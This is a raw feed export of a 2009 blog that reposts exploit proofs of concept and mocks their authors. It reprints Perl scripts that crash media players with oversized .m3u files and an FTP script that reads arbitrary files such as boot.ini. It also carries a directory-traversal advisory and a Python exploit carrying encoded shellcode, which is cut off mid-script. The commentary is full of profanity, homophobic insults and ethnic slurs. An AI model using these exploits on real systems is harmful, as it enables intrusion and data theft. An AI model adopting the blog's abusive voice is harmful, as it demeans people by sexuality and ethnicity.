/&gt;file.close()&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Stack: "CREDIT TO MUHAMMAD FOR MY WHORE OF A MOTHER HAVING ME TO IRRITATE REAL HACKERS BY POSTING SHIT ON MILWORM!"&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-4695236008706133708?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/4695236008706133708/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/coolplayer-portable-2191-skin-buffer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4695236008706133708'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/4695236008706133708'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/coolplayer-portable-2191-skin-buffer.html' title='CoolPlayer Portable 2.19.1 (Skin) Buffer Overflow Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-6662093353939389020</id><published>2009-04-20T11:41:00.000-07:00</published><updated>2009-04-20T11:46:39.064-07:00</updated><title type='text'>CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC</title><content type='html'>Main critism: LETS WELCOME THE NEWEST SCRIPT KIDDIE ON THE SHIT EXPLOIT SCENE, Gold_M!&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ##  ##&lt;br /&gt;# #  CoolPlayerp Portable 2.19.1 (.M3U File) Local Stack Overflow POC   # #&lt;br /&gt;# ## ## ## ## ## ## ## ## ## ## ## ## ## ### ## ## ## ## ## ### ## ## ## ## &lt;br /&gt;my $chars= "A" x 4104;&lt;br /&gt;my $file="goldm.m3u";&lt;br /&gt;open(my $FILE, "&gt;&gt;$file") or die "Cannot open $file: $!";&lt;br /&gt;print $FILE $chars;&lt;br /&gt;close($FILE);&lt;br /&gt;print "$file has been created \n";&lt;br /&gt;print "Thanx Tryag.Com";&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Its a super stack overflowz!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-6662093353939389020?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/6662093353939389020/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/coolplayer-portable-2191-m3u-file-local.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/6662093353939389020'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/6662093353939389020'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/coolplayer-portable-2191-m3u-file-local.html' title='CoolPlayer Portable 2.19.1 (.m3u File) Local Stack Overflow PoC'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-8266930937680920640</id><published>2009-04-16T08:29:00.000-07:00</published><updated>2009-04-16T08:30:45.532-07:00</updated><title type='text'>Apollo 37zz (M3u File) Local Heap Overflow PoC</title><content type='html'>Main critism: Just because you control eax doesn't mean its a fucking heap overflow you no talent loser.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# *******************************************************************************&lt;br /&gt;# *               Apollo 37zz (.M3U File) Local Heap Overflow PoC               *&lt;br /&gt;# *******************************************************************************&lt;br /&gt;#&lt;br /&gt;# Found By : Cyber-Zone (ABDELKHALEK)&lt;br /&gt;# E-mail   : Paradis_des_fous@hotmail.fr&lt;br /&gt;# Home     : WwW.IQ-TY.CoM , WwW.No-Exploit.CoM&lt;br /&gt;# Greetz to: Hussin X , Jiko , ZoRLu , Stack ,Nabilx , Mag!c ompo , And All MoroCCaN HaCkers&lt;br /&gt;# And SP tHANX To : Figuig and Oujda City //Im so proud to be figuigian&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Download : http://apollo.capacala.com/Apollo37zz.exe&lt;br /&gt;#&lt;br /&gt;#OllyDbg Registers&lt;br /&gt;#EAX 41414141&lt;br /&gt;#ECX 00000000&lt;br /&gt;#EDX 00000000&lt;br /&gt;#EBX 0095488C ASCII "1%num% http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&lt;br /&gt;#ESP 0012CA00&lt;br /&gt;#EBP 00954080&lt;br /&gt;#ESI 0012CA24&lt;br /&gt;#EDI 0047A880 Apollo.0047A880&lt;br /&gt;#EIP 00416108 Apollo.00416108&lt;br /&gt;&lt;br /&gt;my $M3U = "#EXTM3U\n";&lt;br /&gt;&lt;br /&gt;my $ProofOfConcept= "http://".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".&lt;br /&gt;"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; # 1014&lt;br /&gt;&lt;br /&gt;open(MYFILE,'&gt;&gt;buffer1.m3u');&lt;br /&gt;&lt;br /&gt;print MYFILE $M3U.$ProofOfConcept;&lt;br /&gt;&lt;br /&gt;close(MYFILE);&lt;br /&gt;&lt;br /&gt;print "Done! For Fun ;)";&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;"Done for fame, loser fame, and animal pron 4 life" - His (her?) new slogan&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-8266930937680920640?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/8266930937680920640/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/apollo-37zz-m3u-file-local-heap.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8266930937680920640'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8266930937680920640'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/apollo-37zz-m3u-file-local-heap.html' title='Apollo 37zz (M3u File) Local Heap Overflow PoC'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-7460670121849927154</id><published>2009-04-15T19:27:00.001-07:00</published><updated>2009-04-15T19:29:00.382-07:00</updated><title type='text'>ASX to MP3 Converter (.M3U File) Local Stack Overflow PoC</title><content type='html'>Main critism: Cyber-Zone seems to be Stack's online fat gay lover.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# ************************************************************************&lt;br /&gt;# *     ASX to MP3 Converter (.M3U File) Local Stack Overflow POC        *&lt;br /&gt;# ************************************************************************&lt;br /&gt;#&lt;br /&gt;# Found By : Cyber-Zone (ABDELKHALEK)&lt;br /&gt;# E-mail   : Paradis_des_fous@hotmail.fr&lt;br /&gt;# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM&lt;br /&gt;# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com&lt;br /&gt;#&lt;br /&gt;# Download product : http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;# Olly registers&lt;br /&gt;#EAX 00000001&lt;br /&gt;#ECX 41414141&lt;br /&gt;#EDX 00D30000&lt;br /&gt;#EBX 00333ED8 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"&lt;br /&gt;#ESP 000F6C90&lt;br /&gt;#EBP 000FBFB4&lt;br /&gt;#ESI 77C2FCE0 msvcrt.77C2FCE0&lt;br /&gt;#EDI 00006619&lt;br /&gt;#EIP 41414141&lt;br /&gt;#&lt;br /&gt;my $Header = "#EXTM3U\n";&lt;br /&gt;&lt;br /&gt;my $ex="http://"."A" x 26121;# just Poc tested under MS windows SP2 Fr&lt;br /&gt;&lt;br /&gt;open(MYFILE,'&gt;&gt;KHAL.m3u');&lt;br /&gt;&lt;br /&gt;print MYFILE $Header.$ex;&lt;br /&gt;&lt;br /&gt;close(MYFILE);&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;What do you get when you put two fuckup script kids together? No 0day. No Exploit. No Code. YOU OWN EIP MOTHER FUCKER!? WHERES THE FUCKING SHELL YOU STUPID FUCK!!!!!!!!!!!!!!!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-7460670121849927154?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/7460670121849927154/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/asx-to-mp3-converter-m3u-file-local.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/7460670121849927154'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/7460670121849927154'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/asx-to-mp3-converter-m3u-file-local.html' title='ASX to MP3 Converter (.M3U File) Local Stack Overflow PoC'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-8276227318519579777</id><published>2009-04-15T19:25:00.000-07:00</published><updated>2009-04-15T19:26:37.134-07:00</updated><title type='text'>ftpdmin 0.96 Arbitrary File Disclosure Exploit</title><content type='html'>Main critism: Stack, YOUR FUCKING LAME!&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;#       ftpdmin 0.96 Arbitrary File Disclosure Exploit&lt;br /&gt;#       Vulnerability Disclosure by 1 Slach or 2 Slach&lt;br /&gt;#       Tested on Win XP SP2 but it work in other box environment&lt;br /&gt;# Abouts Exploit : first thing after we exec the application it make our box a simple ftp server&lt;br /&gt;# so like we see if we want conect in ftp we make that's cmd &gt;&gt; ftp 127.0.0.1 &gt;&gt; user &amp; password allright&lt;br /&gt;# but here our application make an ftp link for exec and partage some file in our box&lt;br /&gt;# so we profite with this partage fontion to get some importent file in server like boot.ini for example&lt;br /&gt;# for that's i make this exploit it conect to ftp trget via 21 port and if after with a single or doble slach we wrote&lt;br /&gt;# our importent file like boot.ini&lt;br /&gt;# so this the end of all&lt;br /&gt;# message for (ks) use your mind to have more importent thing in server&lt;br /&gt; &lt;br /&gt;&lt;br /&gt;use LWP::Simple;&lt;br /&gt;use LWP::UserAgent;&lt;br /&gt; &lt;br /&gt;if (@ARGV &lt; 3) {&lt;br /&gt;            print("Usage: $0 &lt;url&gt; &lt;port&gt; &lt;filename&gt; &lt;target&gt; \n");&lt;br /&gt;            print("TARGETS are\n ");&lt;br /&gt;            print("Define full path with file name \n");&lt;br /&gt;            print("Example FTP: perl $0 127.0.0.1 21 boot.ini \n");&lt;br /&gt;            exit(1);&lt;br /&gt;                    }&lt;br /&gt;                    ($target, $port,$filename) = @ARGV;&lt;br /&gt;        print("ftpdmin 0.96 Exploit : Coded by Stack!\n");&lt;br /&gt;        print("Attacking $target on port $port!\n");&lt;br /&gt;        print("FILENAME:  $filename\n");&lt;br /&gt;       &lt;br /&gt;        $temp="/" x 2;&lt;br /&gt;         my $url= "ftp://". $target. ":" . $port .$temp . $filename;&lt;br /&gt;            $content=get $url;&lt;br /&gt;            print("\n FILE CONTENT STARTED");&lt;br /&gt;            print("\n -----------------------------------\n");&lt;br /&gt;            print("$content");&lt;br /&gt;            print("\n -------------------------------------\n");&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;Your code is shit. Give up and stop embarrassing yourself you idiot!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-8276227318519579777?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/8276227318519579777/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/ftpdmin-096-arbitrary-file-disclosure.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8276227318519579777'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/8276227318519579777'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/ftpdmin-096-arbitrary-file-disclosure.html' title='ftpdmin 0.96 Arbitrary File Disclosure Exploit'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-3321770260690906929</id><published>2009-04-15T19:23:00.000-07:00</published><updated>2009-04-15T19:25:03.308-07:00</updated><title type='text'>Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability</title><content type='html'>Main critism: WHAT&gt;&gt;THE&gt;&gt;FUCK&gt;&gt;&gt;&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;&lt;br /&gt;Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-036&lt;br /&gt;&lt;br /&gt;original advisory: http://dsecrg.com/pages/vul/DSECRG-09-036.html&lt;br /&gt;&lt;br /&gt;Application:                Chance-i DiViS DVR System web-server&lt;br /&gt;Versions Affected:          2.0&lt;br /&gt;Vendor URL:                 http://www.chance-i.com/&lt;br /&gt;Bug:                        Directory Traversal File Download&lt;br /&gt;Exploits:                   YES&lt;br /&gt;Reported:                   13.03.2009&lt;br /&gt;Second Reported:            20.03.2009&lt;br /&gt;Solution:                   NONE&lt;br /&gt;Date of Public Advisory:    09.04.2009&lt;br /&gt;Author:                     Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Description&lt;br /&gt;***********&lt;br /&gt;&lt;br /&gt;DiViS DVR System web-server which fingerprints as Techno Vision Security System has Directory Traversal vulnerability.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Details&lt;br /&gt;*******&lt;br /&gt;&lt;br /&gt;Directory traversal vulnerability find in DiViS DVR System web-server.&lt;br /&gt;&lt;br /&gt;Successfully exploiting these issues allows remote attackers to access the contents of arbitrary files.&lt;br /&gt;&lt;br /&gt;Example:&lt;br /&gt;&lt;br /&gt;http://[server]/../../../../../../../boot.ini&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Solution:&lt;br /&gt;*********&lt;br /&gt;&lt;br /&gt;We did not get any response from vendor for more than 2 weeks.&lt;br /&gt;&lt;br /&gt;No patches aviable.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;About&lt;br /&gt;*****&lt;br /&gt;&lt;br /&gt;Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards.&lt;br /&gt;Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Contact:    research [at] dsecrg [dot] com&lt;br /&gt;            http://www.dsecrg.com&lt;br /&gt;            http://www.dsec.ru&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;"Digital Security is leading IT security company in Russia" = Wow, Russia just disowned you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6109242264951838141-3321770260690906929?l=exploitcritics.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://exploitcritics.blogspot.com/feeds/3321770260690906929/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/chance-i-divis-dvr-system-web-server.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/3321770260690906929'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6109242264951838141/posts/default/3321770260690906929'/><link rel='alternate' type='text/html' href='http://exploitcritics.blogspot.com/2009/04/chance-i-divis-dvr-system-web-server.html' title='Chance-i DiViS DVR System Web-server Directory Traversal Vulnerability'/><author><name>Exploit Critics</name><uri>http://www.blogger.com/profile/16228243081950486779</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='25' height='32' src='http://4.bp.blogspot.com/_y6aWq6tGG98/SedSBpiUyrI/AAAAAAAAAAM/K4pINNKyv4A/s1600-R/domenico.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6109242264951838141.post-8084642443799121799</id><published>2009-04-15T19:18:00.000-07:00</published><updated>2009-04-15T19:22:48.838-07:00</updated><title type='text'>Abee Chm eBook Creator 2.11 (FileName) Local Stack Overflow Exploit</title><content type='html'>Main critism: Does anyone in the arab world know how to make a decent fucking header!? SHIT!&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;# exploit.py&lt;br /&gt;# Abee Chm eBook Creator 2.11 Stack overflow Exploit&lt;br /&gt;# By:Encrypt3d.M!nd&lt;br /&gt;#&lt;br /&gt;# it's the same exploit i wrote for chm maker,everything is the same!!&lt;br /&gt;# but there's a lil note that when importing 'Devil_Inside.chmprj' a message&lt;br /&gt;# will pops up and tells that the project file format is outdated bla bla but after clicking&lt;br /&gt;# ok it will load into the program,and just go to File&gt;Make Ebook.. and calc&lt;br /&gt;# p.s:you can avoid the message by using chm ebook project data,i'm lazy to do that&lt;br /&gt;# so i've used the chm maker one :D&lt;br /&gt;&lt;br /&gt;ns = "\xEB\x06\x90\x90"&lt;br /&gt;sh = "\x05\x67\x35\x45"&lt;br /&gt;&lt;br /&gt;shellcode = (&lt;br /&gt;"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"&lt;br /&gt;"\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"&lt;br /&gt;"\x58\x30\x41\x31\x50\x41\x42\x6b\x42\x41\x71\x32\x42\x42\x42\x32"&lt;br /&gt;"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x4d\x39\x69\x6c\x4d"&lt;br /&gt;"\x38\x43\x74\x35\x50\x53\x30\x77\x70\x4e\x6b\x53\x75\x77\x4c\x4c"&lt;br /&gt;"\x4b\x63\x4c\x54\x45\x34\x38\x67\x71\x5a\x4f\x6c\x4b\x62\x6f\x75"&lt;br /&gt;"\x48\x6e\x6b\x41\x4f\x47\x50\x33\x31\x58\x6b\x63\x79\x4e\x6b\x36"&lt;br /&gt;"\x54\x4c\x4b\x45\x51\x68\x6e\x34\x71\x59\x50\x4c\x59\x4c\x6c\x4f"&lt;br /&gt;"\x74\x6f\x30\x72\x54\x47\x77\x58\x41\x39\x5a\x34\x4d\x57\x71\x69"&lt;br /&gt;"\x52\x48\x6b\x69\x64\x67\x4b\x46\x34\x66\x44\x74\x44\x53\x45\x6b"&lt;br /&gt;"\x55\x4c\x4b\x43\x6f\x31\x34\x67\x71\x78\x6b\x63\x56\x4c\x4b\x54"&lt;br /&gt;"\x4c\x62\x6b\x6e\x6b\x31\x4f\x67\x6c\x37\x71\x78\x6b\x4c\x4b\x45"&lt;br /&gt;"\x4c\x4c\x4b\x73\x31\x4a\x4b\x6c\x49\x51\x4c\x74\x64\x67\x74\x6b"&lt;br /&gt;"\x73\x34\x71\x6f\x30\x42\x44\x6c\x4b\x71\x50\x34\x70\x4e\x65\x4f"&lt;br /&gt;"\x30\x62\x58\x46\x6c\x6c\x4b\x41\x50\x44\x4c\x4c\x4b\x42\x50\x65"&lt;br /&gt;"\x4c\x4e\x4d\x6e\x6b\x50\x68\x34\x48\x4a\x4b\x73\x39\x6e\x6b\x4b"&lt;br /&gt;"\x30\x4c\x70\x57\x70\x63\x30\x37\x70\x4e\x6b\x42\x48\x57\x4c\x51"&lt;br /&gt;"\x4f\x56\x51\x48\x76\x31\x70\x73\x66\x6e\x69\x59\x68\x4e\x63\x4f"&lt;br /&gt;"\x30\x73\x4b\x66\x30\x65\x38\x68\x70\x6d\x5a\x34\x44\x51\x4f\x30"&lt;br /&gt;"\x68\x4e\x78\x4b\x4e\x6c\x4a\x54\x4e\x32\x77\x79\x6f\x79\x77\x41"&lt;br /&gt;"\x73\x75\x31\x72\x4c\x41\x73\x57\x70\x61")&lt;br /&gt;&lt;br /&gt;header1 = (&lt;br /&gt;'\n'&lt;br /&gt;..... should we really go on .....&lt;br /&gt;'\n'&lt;br 